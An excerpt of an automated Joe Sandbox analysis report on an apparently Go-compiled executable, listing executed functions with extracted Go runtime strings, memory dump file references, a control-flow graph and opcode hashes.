46885->46839 46886->46839 46887->46841 46888->46841 46889->46871 46890->46871 46891->46871 46892->46872 46893->46865 46894->46867

            Executed Functions

            Function 006C6D60 Relevance: 13.3, Strings: 10, Instructions: 811COMMON
            Download Yara Rule
            Strings
            • mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod, xrefs: 006C77CF, 006C7BA5
            • sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executionattempte, xrefs: 006C775C
            • mspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPreemptStack=runtime: thread ID overflowstopTheWorld: holding locksgcstopm: not waiting for gcinternal lockOSThread errorruntime: checkdea, xrefs: 006C7BCA
            • sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminated, xrefs: 006C77AF, 006C7B85
            • previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:, xrefs: 006C7865
            • nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWi, xrefs: 006C7848
            • mspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification, xrefs: 006C77F8
            • sweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevrunt, xrefs: 006C78AF
            • swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb, xrefs: 006C776D
            • mspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1, xrefs: 006C7BDB
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: mheap.sweepgen=runtime: nelems=workbuf is emptymSpanList.removemSpanList.insertbad special kindbad summary dataruntime: addr = runtime: base = runtime: head = timeBeginPeriod$ nalloc= nfreed=[signal newval= mcount= bytes, stack=[ minLC= maxpc= stack=[ minutes etypes no anodeCancelIoReadFileAcceptExWSAIoctlshutdownThursdaySaturdayFebruaryNovemberDecember%!Month(_NewEnum%02d%02drole_arncsm_hostcsm_portUploadIdEqualSidSetEventIsWi$ previous allocCount=, levelBits[level] = runtime: searchIdx = defer on system stackpanic on system stackasync stack too largestartm: m is spinningstartlockedm: m has pfindrunnable: wrong ppreempt at unknown pcreleasep: invalid argcheckdead: runnable gruntime:$ sweepgen= sweepgen , bound = , limit = tracefree(tracegc()exitThreadBad varintGC forced runqueue= stopwait= runqsize= gfreecnt= throwing= spinning=atomicand8float64nanfloat32nanException ptrSize= targetpc= until pc=unknown pcruntime: ggoroutine terminated$mspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResumeNotification$mspan.sweep: bad span stateinvalid profile bucket typeruntime: corrupted polldescruntime: netpollinit failedruntime: asyncPreemptStack=runtime: thread ID overflowstopTheWorld: holding locksgcstopm: not waiting for gcinternal lockOSThread errorruntime: checkdea$mspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.semasleep unexpectedfatal: morestack on gsignalruntime: casgstatus: oldval=gcstopm: negative nmspinningfindrunnable: netpoll with psave on system g not allowednewproc1$sweep increased allocation countremovespecial on invalid pointerruntime: root level max pages = WSAGetOverlappedResult not found_cgo_pthread_key_created missingruntime: sudog with non-nil elemruntime: sudog with non-nil nextruntime: sudog with non-nil prevrunt$sweep: tried to preserve a user arena spanruntime: blocked write on closing polldescacquireSudog: found s.elem != nil in cachefatal error: cgo callback before cgo callon a locked thread with no template threadunexpected signal during runtime executionattempte$swept cached spanmarkBits overflowruntime: summary[runtime: level = , p.searchAddr = RtlGetCurrentPeb
            • API String ID: 0-1613859225
            • Opcode ID: 97d9d3d8a97888899cdf5fe5ab4658efeffea282756c65a6783845c8c3aefae6
            • Instruction ID: e38d7b43097f7b7100d51cd9d168a0eab24b768843ddd6adcc0d402a6425a3a0
            • Opcode Fuzzy Hash: 97d9d3d8a97888899cdf5fe5ab4658efeffea282756c65a6783845c8c3aefae6
            • Instruction Fuzzy Hash: F7829D73608BC486CB61CB25E4407AEB7A2F789B84F44912AEBCD43B59DF38C595CB50
            Function 006AD660 Relevance: 12.9, Strings: 10, Instructions: 384COMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 606 6ad660-6ad669 607 6ad66f-6ad6b2 606->607 608 6adde6-6ade13 call 70ab60 606->608 609 6ad6bb-6ad6d9 call 6af2a0 607->609 610 6ad6b4-6ad6b6 607->610 608->606 621 6ad6db-6ad700 609->621 622 6ad705 609->622 612 6ada87-6ada8d 610->612 615 6adbb2-6adbc1 612->615 616 6ada93-6adab4 612->616 618 6adbc4-6adbc7 615->618 619 6adab6-6adac3 616->619 620 6adac5-6adae7 616->620 623 6adc8b-6adc95 618->623 624 6adbcd-6adbe3 call 6ade20 618->624 625 6adb41-6adb47 619->625 626 6adae9-6adaec 620->626 627 6adaee-6adb00 call 6b85e0 620->627 621->612 628 6ad70a-6ad783 622->628 632 6adcb0-6adcc9 623->632 633 6adc97-6adcae 623->633 649 6adbe9-6adc81 call 6bafe0 * 2 624->649 650 6add25-6add31 624->650 634 6adb49-6adb4c 625->634 635 6adb9e-6adbb0 625->635 626->625 639 6adb05-6adb39 627->639 636 6ad789-6ad794 628->636 637 6ad9e5-6ad9f0 628->637 643 6adcda-6add06 632->643 644 6adccb-6adcd8 632->644 640 6add0a-6add0d 633->640 641 6adb52-6adb99 call 6b8500 634->641 642 6ada56-6ada84 634->642 635->618 647 6ad79a-6ad7aa 636->647 648 6ada49-6ada51 call 70ce60 636->648 639->625 645 6add0f-6add16 640->645 646 6add45-6adde5 call 6db220 call 6dbaa0 call 6db920 call 6dbaa0 call 6db920 call 6dbaa0 * 2 call 6db460 call 6db280 call 6d9780 640->646 641->642 642->612 643->640 644->640 653 6add18-6add20 645->653 654 6add32-6add40 call 6d9780 645->654 646->608 655 6ad7b0-6ad7e5 call 6d6cc0 647->655 656 6ad857-6ad868 647->656 648->642 649->623 653->628 654->646 666 6ad7ea-6ad804 655->666 664 6ad86e-6ad89b call 6af2a0 656->664 665 6ada27-6ada33 call 6d9780 656->665 680 6ad8bc-6ad8c7 664->680 681 6ad89d-6ad8b6 call 6aeee0 664->681 672 6ada38-6ada44 call 6d9780 665->672 671 6ad80a-6ad819 666->671 666->672 676 6ad81b-6ad81c 671->676 677 6ad81e 671->677 672->648 684 6ad81f-6ad84d 676->684 677->684 682 6ad9ce-6ad9db 680->682 683 6ad8cd-6ad8e7 680->683 681->680 691 6ada16-6ada22 call 6d9780 681->691 682->637 688 6ad8ed-6ad8f9 683->688 689 6ad996-6ad9ab 683->689 684->656 692 6ad8fb 688->692 693 6ad902-6ad923 call 6aeee0 688->693 695 6ad9fc-6ada00 call 70cec0 689->695 696 6ad9ad-6ad9b7 689->696 691->665 692->693 705 6ada05-6ada11 call 6d9780 693->705 708 6ad929-6ad96e 693->708 695->705 701 6ad9b9-6ad9c9 696->701 702 6ad9f1-6ad9f7 call 70ce40 696->702 702->695 705->691 711 6ad970-6ad979 call 70d820 708->711 712 6ad981-6ad98e 708->712 711->712 712->689
            Strings
            • base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c, xrefs: 006ADCD1
            • out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit, xrefs: 006ADA05
            • end outside usable address spaceGCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo, xrefs: 006ADCFF
            • , xrefs: 006ADCEF
            • out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume, xrefs: 006ADA38
            • arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p , xrefs: 006ADA27
            • memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new , xrefs: 006ADDD2
            • out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi, xrefs: 006ADA16
            • region exceeds uintptr rangeneed padding in bucket (key)/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime., xrefs: 006ADCA7
            • ) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: , xrefs: 006ADDA5
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495585835.0000000001378000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495605147.000000000137B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495624340.000000000137D000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000137F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.0000000001408000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495642109.000000000140D000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495729001.0000000001417000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495939109.00000000016F8000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495957796.00000000016F9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6a0000_file.jbxd
            Similarity
            • API ID:
            • String ID: $) not in usable address space: runtime: cannot allocate memorycheckmark found unmarked objectruntime: failed to commit pages/memory/classes/heap/free:bytes/memory/classes/os-stacks:bytespacer: sweep done at heap size non in-use span in unswept listcasgstatus: $arena already initialized to unused region of span bytes failed with errno=runtime: VirtualAlloc of /sched/gomaxprocs:threadsremaining pointer buffersslice bounds out of range_cgo_thread_start missingallgadd: bad status Gidleruntime: program exceeds startm: p $base outside usable address spaceruntime: memory allocated by OS [misrounded allocation in sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-c$end outside usable address spaceGCProg for type that isn't largeruntime: failed to release pagesruntime: fixalloc size too largeinvalid limiter event type foundscanstack: goroutine not stoppedscavenger state is already wiredsweep increased allocation countremo$memory reservation exceeds address space limittried to park scavenger from another goroutinereleased less than one physical page of memory (bad use of unsafe.Pointer? try -d=checkptr)sysGrow bounds not aligned to pallocChunkBytesruntime: failed to create new $out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning wit$out of memory allocating heap arena map/cpu/classes/gc/mark/assist:cpu-seconds/cpu/classes/scavenge/total:cpu-seconds/memory/classes/profiling/buckets:bytesmspan.sweep: bad span state after sweepruntime: blocked write on free polldescPowerRegisterSuspendResume$out of memory allocating heap arena metadata/cpu/classes/scavenge/background:cpu-secondsruntime: unexpected metric registration for gcmarknewobject called while doing checkmarkactive sweepers found at start of mark phaseno P available, write barriers are forbi$region exceeds uintptr rangeneed padding in bucket (key)/gc/heap/frees-by-size:bytes/gc/heap/tiny/allocs:objects/sched/goroutines:goroutinesgcBgMarkWorker: mode not setmspan.sweep: m is not lockedfound pointer to free objectmheap.freeSpanLocked - span runtime.
            • API String ID: 0-3453851597
            • Opcode ID: bceac1974917a9fd74c2fad1b2015966c2fb27ba7c1e7cc2f0cd03633fa724b6
            • Instruction ID: db3a447cafa584bf8a2e53b64847e64ebff21fab1143712a399f97e4313e69ed
            • Opcode Fuzzy Hash: bceac1974917a9fd74c2fad1b2015966c2fb27ba7c1e7cc2f0cd03633fa724b6
            • Instruction Fuzzy Hash: 86028172609B8481DBA0DB51E4407EAB766F78AB90F448126EFDE57B99CF7CC844CB10
            Function 006AE200 Relevance: 9.3, Strings: 7, Instructions: 547COMMON
            Download Yara Rule
            Strings
            • mallocgc called with gcphase == _GCmarkterminationrecursive call during initialization - linker skewattempt to execute system stack code on user stackcompileCallback: function argument frame too largetls: received unexpected CertificateStatus messagetls: inval, xrefs: 006AEAB8
            • mallocgc called without a P or outside bootstrappingruntime.SetFinalizer: pointer not in allocated blockruntime: use of FixAlloc_Alloc before FixAlloc_Initspan set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= , xrefs: 006AEA85
            • malloc deadlockruntime error: elem size wrong with GC progscan missed a gmisaligned maskruntime: min = runtime: inUse=runtime: max = bad panic stackrecovery failedstopm holding pstartm: m has ppreempt SPWRITEmissing mcache?ms: gomaxprocs=randinit missed]mo, xrefs: 006AEAA7
            • unexpected malloc header in delayed zeroing of large objectbufio.Scanner: SplitFunc returns advance count beyond inputsync: WaitGroup is reused before previous Wait has returnedreflect: reflect.Value.Elem on an invalid notinheap pointerreflect: indirection thr, xrefs: 006AEA2C
            • malloc during signalclose of nil channelinconsistent lockedmnotetsleep not on g0bad system page size to unallocated span/gc/scan/stack:bytes/gc/scan/total:bytes/gc/heap/frees:bytes/gc/gomemlimit:bytesp mcache not flushed markroot jobs donepacer: assist ratio=, xrefs: 006AEA96
            • delayed zeroing on data that may contain pointersruntime.reflect_makemap: unsupported map key typesweeper left outstanding across sweep generationsfully empty unfreed span set block found in resetcasgstatus: waiting for Gwaiting but is Grunnablestrings.Reader., xrefs: 006AEA3D
            • !"#$%%&&''((()))*++,,,,,------....//////0001123333333333444444444455666677777888888888889999999999::::::;;;;;;;;;;;;;;;;<<<<<<<<<<<<<<<<=====>>>>>>>>>>>??????????@@@@@@@@@@@@@@@@@@@@@@AAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC, xrefs: 006AE593
            Memory Dump Source
            • Source File: 00000002.00000002.1488870893.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
            • Associated: 00000002.00000002.1488811992.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000000AFF000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001066000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001073000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107A000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.000000000107F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001083000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001086000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010BA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010C8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D3000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010D6000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010DE000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E5000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010E7000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010EB000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F1000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F4000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010F8000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FA000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.00000000010FC000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001101000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1489874243.0000000001107000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495309832.0000000001331000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495329316.0000000001334000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495347974.0000000001336000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495368291.0000000001337000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495386569.0000000001339000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495409254.000000000133A000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495438018.0000000001363000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495459528.0000000001364000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495482212.0000000001365000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495505314.0000000001366000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495529886.0000000001367000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495545644.0000000001369000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.1495565773.000000000136A000.00000004.00000001.01000000.00000003.sdmpDownload File
